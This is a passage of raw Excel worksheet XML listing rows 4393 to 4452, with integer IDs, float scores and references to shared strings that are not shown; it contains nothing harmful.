        <v>2</v>
      </c>
      <c r="E4393">
        <v>0.49489998817443848</v>
      </c>
      <c r="F4393" t="s">
        <v>5592</v>
      </c>
      <c r="G4393" t="s">
        <v>8684</v>
      </c>
      <c r="H4393" t="s">
        <v>8685</v>
      </c>
    </row>
    <row r="4394" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4394" s="1">
        <v>4392</v>
      </c>
      <c r="B4394">
        <v>604</v>
      </c>
      <c r="C4394">
        <v>604</v>
      </c>
      <c r="D4394">
        <v>2</v>
      </c>
      <c r="E4394">
        <v>0.53250002861022949</v>
      </c>
      <c r="F4394" t="s">
        <v>5592</v>
      </c>
      <c r="G4394" t="s">
        <v>8686</v>
      </c>
      <c r="H4394" t="s">
        <v>8687</v>
      </c>
    </row>
    <row r="4395" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4395" s="1">
        <v>4393</v>
      </c>
      <c r="B4395">
        <v>606</v>
      </c>
      <c r="C4395">
        <v>606</v>
      </c>
      <c r="D4395">
        <v>2</v>
      </c>
      <c r="E4395">
        <v>0.99659997224807739</v>
      </c>
      <c r="F4395" t="s">
        <v>5592</v>
      </c>
      <c r="G4395" t="s">
        <v>8688</v>
      </c>
      <c r="H4395" t="s">
        <v>8689</v>
      </c>
    </row>
    <row r="4396" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4396" s="1">
        <v>4394</v>
      </c>
      <c r="B4396">
        <v>7658</v>
      </c>
      <c r="C4396">
        <v>7658</v>
      </c>
      <c r="D4396">
        <v>2</v>
      </c>
      <c r="E4396">
        <v>0.99720001220703125</v>
      </c>
      <c r="F4396" t="s">
        <v>5592</v>
      </c>
      <c r="G4396" t="s">
        <v>8690</v>
      </c>
      <c r="H4396" t="s">
        <v>8691</v>
      </c>
    </row>
    <row r="4397" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4397" s="1">
        <v>4395</v>
      </c>
      <c r="B4397">
        <v>7657</v>
      </c>
      <c r="C4397">
        <v>7657</v>
      </c>
      <c r="D4397">
        <v>2</v>
      </c>
      <c r="E4397">
        <v>0.99430000782012939</v>
      </c>
      <c r="F4397" t="s">
        <v>5592</v>
      </c>
      <c r="G4397" t="s">
        <v>8692</v>
      </c>
      <c r="H4397" t="s">
        <v>8693</v>
      </c>
    </row>
    <row r="4398" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4398" s="1">
        <v>4396</v>
      </c>
      <c r="B4398">
        <v>612</v>
      </c>
      <c r="C4398">
        <v>612</v>
      </c>
      <c r="D4398">
        <v>2</v>
      </c>
      <c r="E4398">
        <v>0.99730002880096436</v>
      </c>
      <c r="F4398" t="s">
        <v>5592</v>
      </c>
      <c r="G4398" t="s">
        <v>8694</v>
      </c>
      <c r="H4398" t="s">
        <v>8695</v>
      </c>
    </row>
    <row r="4399" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4399" s="1">
        <v>4397</v>
      </c>
      <c r="B4399">
        <v>617</v>
      </c>
      <c r="C4399">
        <v>617</v>
      </c>
      <c r="D4399">
        <v>2</v>
      </c>
      <c r="E4399">
        <v>0.705299973487854</v>
      </c>
      <c r="F4399" t="s">
        <v>5592</v>
      </c>
      <c r="G4399" t="s">
        <v>8696</v>
      </c>
      <c r="H4399" t="s">
        <v>8697</v>
      </c>
    </row>
    <row r="4400" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4400" s="1">
        <v>4398</v>
      </c>
      <c r="B4400">
        <v>7653</v>
      </c>
      <c r="C4400">
        <v>7653</v>
      </c>
      <c r="D4400">
        <v>2</v>
      </c>
      <c r="E4400">
        <v>0.85199999809265137</v>
      </c>
      <c r="F4400" t="s">
        <v>5592</v>
      </c>
      <c r="G4400" t="s">
        <v>8698</v>
      </c>
      <c r="H4400" t="s">
        <v>8699</v>
      </c>
    </row>
    <row r="4401" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4401" s="1">
        <v>4399</v>
      </c>
      <c r="B4401">
        <v>620</v>
      </c>
      <c r="C4401">
        <v>620</v>
      </c>
      <c r="D4401">
        <v>2</v>
      </c>
      <c r="E4401">
        <v>0.68339997529983521</v>
      </c>
      <c r="F4401" t="s">
        <v>5592</v>
      </c>
      <c r="G4401" t="s">
        <v>8700</v>
      </c>
      <c r="H4401" t="s">
        <v>8701</v>
      </c>
    </row>
    <row r="4402" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4402" s="1">
        <v>4400</v>
      </c>
      <c r="B4402">
        <v>7651</v>
      </c>
      <c r="C4402">
        <v>7651</v>
      </c>
      <c r="D4402">
        <v>2</v>
      </c>
      <c r="E4402">
        <v>0.69470000267028809</v>
      </c>
      <c r="F4402" t="s">
        <v>5592</v>
      </c>
      <c r="G4402" t="s">
        <v>8702</v>
      </c>
      <c r="H4402" t="s">
        <v>8199</v>
      </c>
    </row>
    <row r="4403" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4403" s="1">
        <v>4401</v>
      </c>
      <c r="B4403">
        <v>623</v>
      </c>
      <c r="C4403">
        <v>623</v>
      </c>
      <c r="D4403">
        <v>2</v>
      </c>
      <c r="E4403">
        <v>0.63929998874664307</v>
      </c>
      <c r="F4403" t="s">
        <v>5592</v>
      </c>
      <c r="G4403" t="s">
        <v>8703</v>
      </c>
      <c r="H4403" t="s">
        <v>8704</v>
      </c>
    </row>
    <row r="4404" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4404" s="1">
        <v>4402</v>
      </c>
      <c r="B4404">
        <v>626</v>
      </c>
      <c r="C4404">
        <v>626</v>
      </c>
      <c r="D4404">
        <v>2</v>
      </c>
      <c r="E4404">
        <v>0.60430002212524414</v>
      </c>
      <c r="F4404" t="s">
        <v>5592</v>
      </c>
      <c r="G4404" t="s">
        <v>8705</v>
      </c>
      <c r="H4404" t="s">
        <v>8706</v>
      </c>
    </row>
    <row r="4405" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4405" s="1">
        <v>4403</v>
      </c>
      <c r="B4405">
        <v>578</v>
      </c>
      <c r="C4405">
        <v>578</v>
      </c>
      <c r="D4405">
        <v>2</v>
      </c>
      <c r="E4405">
        <v>0.40320000052452087</v>
      </c>
      <c r="F4405" t="s">
        <v>5592</v>
      </c>
      <c r="G4405" t="s">
        <v>8707</v>
      </c>
      <c r="H4405" t="s">
        <v>8708</v>
      </c>
    </row>
    <row r="4406" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4406" s="1">
        <v>4404</v>
      </c>
      <c r="B4406">
        <v>577</v>
      </c>
      <c r="C4406">
        <v>577</v>
      </c>
      <c r="D4406">
        <v>2</v>
      </c>
      <c r="E4406">
        <v>0.90829998254776001</v>
      </c>
      <c r="F4406" t="s">
        <v>5592</v>
      </c>
      <c r="G4406" t="s">
        <v>8709</v>
      </c>
      <c r="H4406" t="s">
        <v>8710</v>
      </c>
    </row>
    <row r="4407" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4407" s="1">
        <v>4405</v>
      </c>
      <c r="B4407">
        <v>575</v>
      </c>
      <c r="C4407">
        <v>575</v>
      </c>
      <c r="D4407">
        <v>2</v>
      </c>
      <c r="E4407">
        <v>0.53210002183914185</v>
      </c>
      <c r="F4407" t="s">
        <v>5592</v>
      </c>
      <c r="G4407" t="s">
        <v>8711</v>
      </c>
      <c r="H4407" t="s">
        <v>8712</v>
      </c>
    </row>
    <row r="4408" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4408" s="1">
        <v>4406</v>
      </c>
      <c r="B4408">
        <v>574</v>
      </c>
      <c r="C4408">
        <v>574</v>
      </c>
      <c r="D4408">
        <v>2</v>
      </c>
      <c r="E4408">
        <v>0.69169998168945313</v>
      </c>
      <c r="F4408" t="s">
        <v>5592</v>
      </c>
      <c r="G4408" t="s">
        <v>8713</v>
      </c>
      <c r="H4408" t="s">
        <v>8714</v>
      </c>
    </row>
    <row r="4409" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4409" s="1">
        <v>4407</v>
      </c>
      <c r="B4409">
        <v>533</v>
      </c>
      <c r="C4409">
        <v>533</v>
      </c>
      <c r="D4409">
        <v>2</v>
      </c>
      <c r="E4409">
        <v>0.53289997577667236</v>
      </c>
      <c r="F4409" t="s">
        <v>5592</v>
      </c>
      <c r="G4409" t="s">
        <v>8715</v>
      </c>
      <c r="H4409" t="s">
        <v>8716</v>
      </c>
    </row>
    <row r="4410" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4410" s="1">
        <v>4408</v>
      </c>
      <c r="B4410">
        <v>534</v>
      </c>
      <c r="C4410">
        <v>534</v>
      </c>
      <c r="D4410">
        <v>2</v>
      </c>
      <c r="E4410">
        <v>0.62129998207092285</v>
      </c>
      <c r="F4410" t="s">
        <v>5592</v>
      </c>
      <c r="G4410" t="s">
        <v>8717</v>
      </c>
      <c r="H4410" t="s">
        <v>5743</v>
      </c>
    </row>
    <row r="4411" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4411" s="1">
        <v>4409</v>
      </c>
      <c r="B4411">
        <v>7688</v>
      </c>
      <c r="C4411">
        <v>7688</v>
      </c>
      <c r="D4411">
        <v>2</v>
      </c>
      <c r="E4411">
        <v>0.7849000096321106</v>
      </c>
      <c r="F4411" t="s">
        <v>5592</v>
      </c>
      <c r="G4411" t="s">
        <v>8718</v>
      </c>
      <c r="H4411" t="s">
        <v>8719</v>
      </c>
    </row>
    <row r="4412" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4412" s="1">
        <v>4410</v>
      </c>
      <c r="B4412">
        <v>7684</v>
      </c>
      <c r="C4412">
        <v>7684</v>
      </c>
      <c r="D4412">
        <v>2</v>
      </c>
      <c r="E4412">
        <v>0.96439999341964722</v>
      </c>
      <c r="F4412" t="s">
        <v>5592</v>
      </c>
      <c r="G4412" t="s">
        <v>8720</v>
      </c>
      <c r="H4412" t="s">
        <v>8721</v>
      </c>
    </row>
    <row r="4413" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4413" s="1">
        <v>4411</v>
      </c>
      <c r="B4413">
        <v>7683</v>
      </c>
      <c r="C4413">
        <v>7683</v>
      </c>
      <c r="D4413">
        <v>2</v>
      </c>
      <c r="E4413">
        <v>0.50999999046325684</v>
      </c>
      <c r="F4413" t="s">
        <v>5592</v>
      </c>
      <c r="G4413" t="s">
        <v>8722</v>
      </c>
      <c r="H4413" t="s">
        <v>8723</v>
      </c>
    </row>
    <row r="4414" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4414" s="1">
        <v>4412</v>
      </c>
      <c r="B4414">
        <v>544</v>
      </c>
      <c r="C4414">
        <v>544</v>
      </c>
      <c r="D4414">
        <v>2</v>
      </c>
      <c r="E4414">
        <v>0.84859997034072876</v>
      </c>
      <c r="F4414" t="s">
        <v>5592</v>
      </c>
      <c r="G4414" t="s">
        <v>8724</v>
      </c>
      <c r="H4414" t="s">
        <v>8725</v>
      </c>
    </row>
    <row r="4415" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4415" s="1">
        <v>4413</v>
      </c>
      <c r="B4415">
        <v>546</v>
      </c>
      <c r="C4415">
        <v>546</v>
      </c>
      <c r="D4415">
        <v>2</v>
      </c>
      <c r="E4415">
        <v>0.6029999852180481</v>
      </c>
      <c r="F4415" t="s">
        <v>5592</v>
      </c>
      <c r="G4415" t="s">
        <v>8726</v>
      </c>
      <c r="H4415" t="s">
        <v>8727</v>
      </c>
    </row>
    <row r="4416" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4416" s="1">
        <v>4414</v>
      </c>
      <c r="B4416">
        <v>7682</v>
      </c>
      <c r="C4416">
        <v>7682</v>
      </c>
      <c r="D4416">
        <v>2</v>
      </c>
      <c r="E4416">
        <v>0.99599999189376831</v>
      </c>
      <c r="F4416" t="s">
        <v>5592</v>
      </c>
      <c r="G4416" t="s">
        <v>8728</v>
      </c>
      <c r="H4416" t="s">
        <v>8729</v>
      </c>
    </row>
    <row r="4417" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4417" s="1">
        <v>4415</v>
      </c>
      <c r="B4417">
        <v>550</v>
      </c>
      <c r="C4417">
        <v>550</v>
      </c>
      <c r="D4417">
        <v>2</v>
      </c>
      <c r="E4417">
        <v>0.8507000207901001</v>
      </c>
      <c r="F4417" t="s">
        <v>5592</v>
      </c>
      <c r="G4417" t="s">
        <v>8730</v>
      </c>
      <c r="H4417" t="s">
        <v>8731</v>
      </c>
    </row>
    <row r="4418" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4418" s="1">
        <v>4416</v>
      </c>
      <c r="B4418">
        <v>551</v>
      </c>
      <c r="C4418">
        <v>551</v>
      </c>
      <c r="D4418">
        <v>2</v>
      </c>
      <c r="E4418">
        <v>0.88599997758865356</v>
      </c>
      <c r="F4418" t="s">
        <v>5592</v>
      </c>
      <c r="G4418" t="s">
        <v>8732</v>
      </c>
      <c r="H4418" t="s">
        <v>8733</v>
      </c>
    </row>
    <row r="4419" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4419" s="1">
        <v>4417</v>
      </c>
      <c r="B4419">
        <v>639</v>
      </c>
      <c r="C4419">
        <v>639</v>
      </c>
      <c r="D4419">
        <v>2</v>
      </c>
      <c r="E4419">
        <v>0.99489998817443848</v>
      </c>
      <c r="F4419" t="s">
        <v>5592</v>
      </c>
      <c r="G4419" t="s">
        <v>8734</v>
      </c>
      <c r="H4419" t="s">
        <v>8735</v>
      </c>
    </row>
    <row r="4420" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4420" s="1">
        <v>4418</v>
      </c>
      <c r="B4420">
        <v>552</v>
      </c>
      <c r="C4420">
        <v>552</v>
      </c>
      <c r="D4420">
        <v>2</v>
      </c>
      <c r="E4420">
        <v>0.60879999399185181</v>
      </c>
      <c r="F4420" t="s">
        <v>5592</v>
      </c>
      <c r="G4420" t="s">
        <v>8736</v>
      </c>
      <c r="H4420" t="s">
        <v>8737</v>
      </c>
    </row>
    <row r="4421" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4421" s="1">
        <v>4419</v>
      </c>
      <c r="B4421">
        <v>554</v>
      </c>
      <c r="C4421">
        <v>554</v>
      </c>
      <c r="D4421">
        <v>2</v>
      </c>
      <c r="E4421">
        <v>0.80980002880096436</v>
      </c>
      <c r="F4421" t="s">
        <v>5592</v>
      </c>
      <c r="G4421" t="s">
        <v>8738</v>
      </c>
      <c r="H4421" t="s">
        <v>8739</v>
      </c>
    </row>
    <row r="4422" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4422" s="1">
        <v>4420</v>
      </c>
      <c r="B4422">
        <v>7681</v>
      </c>
      <c r="C4422">
        <v>7681</v>
      </c>
      <c r="D4422">
        <v>2</v>
      </c>
      <c r="E4422">
        <v>0.75870001316070557</v>
      </c>
      <c r="F4422" t="s">
        <v>5592</v>
      </c>
      <c r="G4422" t="s">
        <v>8740</v>
      </c>
      <c r="H4422" t="s">
        <v>8741</v>
      </c>
    </row>
    <row r="4423" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4423" s="1">
        <v>4421</v>
      </c>
      <c r="B4423">
        <v>560</v>
      </c>
      <c r="C4423">
        <v>560</v>
      </c>
      <c r="D4423">
        <v>2</v>
      </c>
      <c r="E4423">
        <v>0.993399977684021</v>
      </c>
      <c r="F4423" t="s">
        <v>5592</v>
      </c>
      <c r="G4423" t="s">
        <v>8742</v>
      </c>
      <c r="H4423" t="s">
        <v>8743</v>
      </c>
    </row>
    <row r="4424" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4424" s="1">
        <v>4422</v>
      </c>
      <c r="B4424">
        <v>561</v>
      </c>
      <c r="C4424">
        <v>561</v>
      </c>
      <c r="D4424">
        <v>2</v>
      </c>
      <c r="E4424">
        <v>0.81449997425079346</v>
      </c>
      <c r="F4424" t="s">
        <v>5592</v>
      </c>
      <c r="G4424" t="s">
        <v>8744</v>
      </c>
      <c r="H4424" t="s">
        <v>8745</v>
      </c>
    </row>
    <row r="4425" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4425" s="1">
        <v>4423</v>
      </c>
      <c r="B4425">
        <v>7678</v>
      </c>
      <c r="C4425">
        <v>7678</v>
      </c>
      <c r="D4425">
        <v>2</v>
      </c>
      <c r="E4425">
        <v>0.85920000076293945</v>
      </c>
      <c r="F4425" t="s">
        <v>5592</v>
      </c>
      <c r="G4425" t="s">
        <v>8746</v>
      </c>
      <c r="H4425" t="s">
        <v>8747</v>
      </c>
    </row>
    <row r="4426" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4426" s="1">
        <v>4424</v>
      </c>
      <c r="B4426">
        <v>565</v>
      </c>
      <c r="C4426">
        <v>565</v>
      </c>
      <c r="D4426">
        <v>2</v>
      </c>
      <c r="E4426">
        <v>0.95459997653961182</v>
      </c>
      <c r="F4426" t="s">
        <v>5592</v>
      </c>
      <c r="G4426" t="s">
        <v>8748</v>
      </c>
      <c r="H4426" t="s">
        <v>8749</v>
      </c>
    </row>
    <row r="4427" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4427" s="1">
        <v>4425</v>
      </c>
      <c r="B4427">
        <v>7677</v>
      </c>
      <c r="C4427">
        <v>7677</v>
      </c>
      <c r="D4427">
        <v>2</v>
      </c>
      <c r="E4427">
        <v>0.82410001754760742</v>
      </c>
      <c r="F4427" t="s">
        <v>5592</v>
      </c>
      <c r="G4427" t="s">
        <v>8750</v>
      </c>
      <c r="H4427" t="s">
        <v>8751</v>
      </c>
    </row>
    <row r="4428" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4428" s="1">
        <v>4426</v>
      </c>
      <c r="B4428">
        <v>569</v>
      </c>
      <c r="C4428">
        <v>569</v>
      </c>
      <c r="D4428">
        <v>2</v>
      </c>
      <c r="E4428">
        <v>0.9966999888420105</v>
      </c>
      <c r="F4428" t="s">
        <v>5592</v>
      </c>
      <c r="G4428" t="s">
        <v>8752</v>
      </c>
      <c r="H4428" t="s">
        <v>8753</v>
      </c>
    </row>
    <row r="4429" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4429" s="1">
        <v>4427</v>
      </c>
      <c r="B4429">
        <v>572</v>
      </c>
      <c r="C4429">
        <v>572</v>
      </c>
      <c r="D4429">
        <v>2</v>
      </c>
      <c r="E4429">
        <v>0.88349997997283936</v>
      </c>
      <c r="F4429" t="s">
        <v>5592</v>
      </c>
      <c r="G4429" t="s">
        <v>8754</v>
      </c>
      <c r="H4429" t="s">
        <v>8755</v>
      </c>
    </row>
    <row r="4430" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4430" s="1">
        <v>4428</v>
      </c>
      <c r="B4430">
        <v>573</v>
      </c>
      <c r="C4430">
        <v>573</v>
      </c>
      <c r="D4430">
        <v>2</v>
      </c>
      <c r="E4430">
        <v>0.72009998559951782</v>
      </c>
      <c r="F4430" t="s">
        <v>5592</v>
      </c>
      <c r="G4430" t="s">
        <v>8756</v>
      </c>
      <c r="H4430" t="s">
        <v>8757</v>
      </c>
    </row>
    <row r="4431" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4431" s="1">
        <v>4429</v>
      </c>
      <c r="B4431">
        <v>553</v>
      </c>
      <c r="C4431">
        <v>553</v>
      </c>
      <c r="D4431">
        <v>2</v>
      </c>
      <c r="E4431">
        <v>0.83230000734329224</v>
      </c>
      <c r="F4431" t="s">
        <v>5592</v>
      </c>
      <c r="G4431" t="s">
        <v>8758</v>
      </c>
      <c r="H4431" t="s">
        <v>6238</v>
      </c>
    </row>
    <row r="4432" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4432" s="1">
        <v>4430</v>
      </c>
      <c r="B4432">
        <v>640</v>
      </c>
      <c r="C4432">
        <v>640</v>
      </c>
      <c r="D4432">
        <v>2</v>
      </c>
      <c r="E4432">
        <v>0.86019998788833618</v>
      </c>
      <c r="F4432" t="s">
        <v>5592</v>
      </c>
      <c r="G4432" t="s">
        <v>8759</v>
      </c>
      <c r="H4432" t="s">
        <v>8760</v>
      </c>
    </row>
    <row r="4433" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4433" s="1">
        <v>4431</v>
      </c>
      <c r="B4433">
        <v>643</v>
      </c>
      <c r="C4433">
        <v>643</v>
      </c>
      <c r="D4433">
        <v>2</v>
      </c>
      <c r="E4433">
        <v>0.99650001525878906</v>
      </c>
      <c r="F4433" t="s">
        <v>5592</v>
      </c>
      <c r="G4433" t="s">
        <v>8761</v>
      </c>
      <c r="H4433" t="s">
        <v>8762</v>
      </c>
    </row>
    <row r="4434" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4434" s="1">
        <v>4432</v>
      </c>
      <c r="B4434">
        <v>646</v>
      </c>
      <c r="C4434">
        <v>646</v>
      </c>
      <c r="D4434">
        <v>2</v>
      </c>
      <c r="E4434">
        <v>0.42419999837875372</v>
      </c>
      <c r="F4434" t="s">
        <v>5592</v>
      </c>
      <c r="G4434" t="s">
        <v>8763</v>
      </c>
      <c r="H4434" t="s">
        <v>8764</v>
      </c>
    </row>
    <row r="4435" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4435" s="1">
        <v>4433</v>
      </c>
      <c r="B4435">
        <v>7587</v>
      </c>
      <c r="C4435">
        <v>7587</v>
      </c>
      <c r="D4435">
        <v>2</v>
      </c>
      <c r="E4435">
        <v>0.7314000129699707</v>
      </c>
      <c r="F4435" t="s">
        <v>5592</v>
      </c>
      <c r="G4435" t="s">
        <v>8765</v>
      </c>
      <c r="H4435" t="s">
        <v>8766</v>
      </c>
    </row>
    <row r="4436" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4436" s="1">
        <v>4434</v>
      </c>
      <c r="B4436">
        <v>7586</v>
      </c>
      <c r="C4436">
        <v>7586</v>
      </c>
      <c r="D4436">
        <v>2</v>
      </c>
      <c r="E4436">
        <v>0.70840001106262207</v>
      </c>
      <c r="F4436" t="s">
        <v>5592</v>
      </c>
      <c r="G4436" t="s">
        <v>8767</v>
      </c>
      <c r="H4436" t="s">
        <v>8768</v>
      </c>
    </row>
    <row r="4437" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4437" s="1">
        <v>4435</v>
      </c>
      <c r="B4437">
        <v>7584</v>
      </c>
      <c r="C4437">
        <v>7584</v>
      </c>
      <c r="D4437">
        <v>2</v>
      </c>
      <c r="E4437">
        <v>0.90659999847412109</v>
      </c>
      <c r="F4437" t="s">
        <v>5592</v>
      </c>
      <c r="G4437" t="s">
        <v>8769</v>
      </c>
      <c r="H4437" t="s">
        <v>8770</v>
      </c>
    </row>
    <row r="4438" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4438" s="1">
        <v>4436</v>
      </c>
      <c r="B4438">
        <v>7583</v>
      </c>
      <c r="C4438">
        <v>7583</v>
      </c>
      <c r="D4438">
        <v>2</v>
      </c>
      <c r="E4438">
        <v>0.99269998073577881</v>
      </c>
      <c r="F4438" t="s">
        <v>5592</v>
      </c>
      <c r="G4438" t="s">
        <v>8771</v>
      </c>
      <c r="H4438" t="s">
        <v>8772</v>
      </c>
    </row>
    <row r="4439" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4439" s="1">
        <v>4437</v>
      </c>
      <c r="B4439">
        <v>7582</v>
      </c>
      <c r="C4439">
        <v>7582</v>
      </c>
      <c r="D4439">
        <v>2</v>
      </c>
      <c r="E4439">
        <v>0.99419999122619629</v>
      </c>
      <c r="F4439" t="s">
        <v>5592</v>
      </c>
      <c r="G4439" t="s">
        <v>8773</v>
      </c>
      <c r="H4439" t="s">
        <v>8774</v>
      </c>
    </row>
    <row r="4440" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4440" s="1">
        <v>4438</v>
      </c>
      <c r="B4440">
        <v>745</v>
      </c>
      <c r="C4440">
        <v>745</v>
      </c>
      <c r="D4440">
        <v>2</v>
      </c>
      <c r="E4440">
        <v>0.73420000076293945</v>
      </c>
      <c r="F4440" t="s">
        <v>5592</v>
      </c>
      <c r="G4440" t="s">
        <v>8775</v>
      </c>
      <c r="H4440" t="s">
        <v>8776</v>
      </c>
    </row>
    <row r="4441" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4441" s="1">
        <v>4439</v>
      </c>
      <c r="B4441">
        <v>747</v>
      </c>
      <c r="C4441">
        <v>747</v>
      </c>
      <c r="D4441">
        <v>2</v>
      </c>
      <c r="E4441">
        <v>0.84909999370574951</v>
      </c>
      <c r="F4441" t="s">
        <v>5592</v>
      </c>
      <c r="G4441" t="s">
        <v>8777</v>
      </c>
      <c r="H4441" t="s">
        <v>8778</v>
      </c>
    </row>
    <row r="4442" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4442" s="1">
        <v>4440</v>
      </c>
      <c r="B4442">
        <v>748</v>
      </c>
      <c r="C4442">
        <v>748</v>
      </c>
      <c r="D4442">
        <v>2</v>
      </c>
      <c r="E4442">
        <v>0.62730002403259277</v>
      </c>
      <c r="F4442" t="s">
        <v>5592</v>
      </c>
      <c r="G4442" t="s">
        <v>8779</v>
      </c>
      <c r="H4442" t="s">
        <v>8780</v>
      </c>
    </row>
    <row r="4443" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4443" s="1">
        <v>4441</v>
      </c>
      <c r="B4443">
        <v>750</v>
      </c>
      <c r="C4443">
        <v>750</v>
      </c>
      <c r="D4443">
        <v>2</v>
      </c>
      <c r="E4443">
        <v>0.79979997873306274</v>
      </c>
      <c r="F4443" t="s">
        <v>5592</v>
      </c>
      <c r="G4443" t="s">
        <v>8781</v>
      </c>
      <c r="H4443" t="s">
        <v>8782</v>
      </c>
    </row>
    <row r="4444" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4444" s="1">
        <v>4442</v>
      </c>
      <c r="B4444">
        <v>758</v>
      </c>
      <c r="C4444">
        <v>758</v>
      </c>
      <c r="D4444">
        <v>2</v>
      </c>
      <c r="E4444">
        <v>0.52399998903274536</v>
      </c>
      <c r="F4444" t="s">
        <v>5592</v>
      </c>
      <c r="G4444" t="s">
        <v>8783</v>
      </c>
      <c r="H4444" t="s">
        <v>8784</v>
      </c>
    </row>
    <row r="4445" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4445" s="1">
        <v>4443</v>
      </c>
      <c r="B4445">
        <v>7589</v>
      </c>
      <c r="C4445">
        <v>7589</v>
      </c>
      <c r="D4445">
        <v>2</v>
      </c>
      <c r="E4445">
        <v>0.4950999915599823</v>
      </c>
      <c r="F4445" t="s">
        <v>5592</v>
      </c>
      <c r="G4445" t="s">
        <v>8785</v>
      </c>
      <c r="H4445" t="s">
        <v>8786</v>
      </c>
    </row>
    <row r="4446" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4446" s="1">
        <v>4444</v>
      </c>
      <c r="B4446">
        <v>759</v>
      </c>
      <c r="C4446">
        <v>759</v>
      </c>
      <c r="D4446">
        <v>2</v>
      </c>
      <c r="E4446">
        <v>0.83230000734329224</v>
      </c>
      <c r="F4446" t="s">
        <v>5592</v>
      </c>
      <c r="G4446" t="s">
        <v>8787</v>
      </c>
      <c r="H4446" t="s">
        <v>6238</v>
      </c>
    </row>
    <row r="4447" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4447" s="1">
        <v>4445</v>
      </c>
      <c r="B4447">
        <v>763</v>
      </c>
      <c r="C4447">
        <v>763</v>
      </c>
      <c r="D4447">
        <v>2</v>
      </c>
      <c r="E4447">
        <v>0.83910000324249268</v>
      </c>
      <c r="F4447" t="s">
        <v>5592</v>
      </c>
      <c r="G4447" t="s">
        <v>8788</v>
      </c>
      <c r="H4447" t="s">
        <v>8789</v>
      </c>
    </row>
    <row r="4448" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4448" s="1">
        <v>4446</v>
      </c>
      <c r="B4448">
        <v>765</v>
      </c>
      <c r="C4448">
        <v>765</v>
      </c>
      <c r="D4448">
        <v>2</v>
      </c>
      <c r="E4448">
        <v>0.57669997215270996</v>
      </c>
      <c r="F4448" t="s">
        <v>5592</v>
      </c>
      <c r="G4448" t="s">
        <v>8790</v>
      </c>
      <c r="H4448" t="s">
        <v>8791</v>
      </c>
    </row>
    <row r="4449" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4449" s="1">
        <v>4447</v>
      </c>
      <c r="B4449">
        <v>767</v>
      </c>
      <c r="C4449">
        <v>767</v>
      </c>
      <c r="D4449">
        <v>2</v>
      </c>
      <c r="E4449">
        <v>0.75220000743865967</v>
      </c>
      <c r="F4449" t="s">
        <v>5592</v>
      </c>
      <c r="G4449" t="s">
        <v>8792</v>
      </c>
      <c r="H4449" t="s">
        <v>8793</v>
      </c>
    </row>
    <row r="4450" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4450" s="1">
        <v>4448</v>
      </c>
      <c r="B4450">
        <v>7565</v>
      </c>
      <c r="C4450">
        <v>7565</v>
      </c>
      <c r="D4450">
        <v>2</v>
      </c>
      <c r="E4450">
        <v>0.99589997529983521</v>
      </c>
      <c r="F4450" t="s">
        <v>5592</v>
      </c>
      <c r="G4450" t="s">
        <v>8794</v>
      </c>
      <c r="H4450" t="s">
        <v>8795</v>
      </c>
    </row>
    <row r="4451" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4451" s="1">
        <v>4449</v>
      </c>
      <c r="B4451">
        <v>775</v>
      </c>
      <c r="C4451">
        <v>775</v>
      </c>
      <c r="D4451">
        <v>2</v>
      </c>
      <c r="E4451">
        <v>0.65289998054504395</v>
      </c>
      <c r="F4451" t="s">
        <v>5592</v>
      </c>
      <c r="G4451" t="s">
        <v>8796</v>
      </c>
      <c r="H4451" t="s">
        <v>8797</v>
      </c>
    </row>
    <row r="4452" spans="1:8" x14ac:dyDescent="0.45">
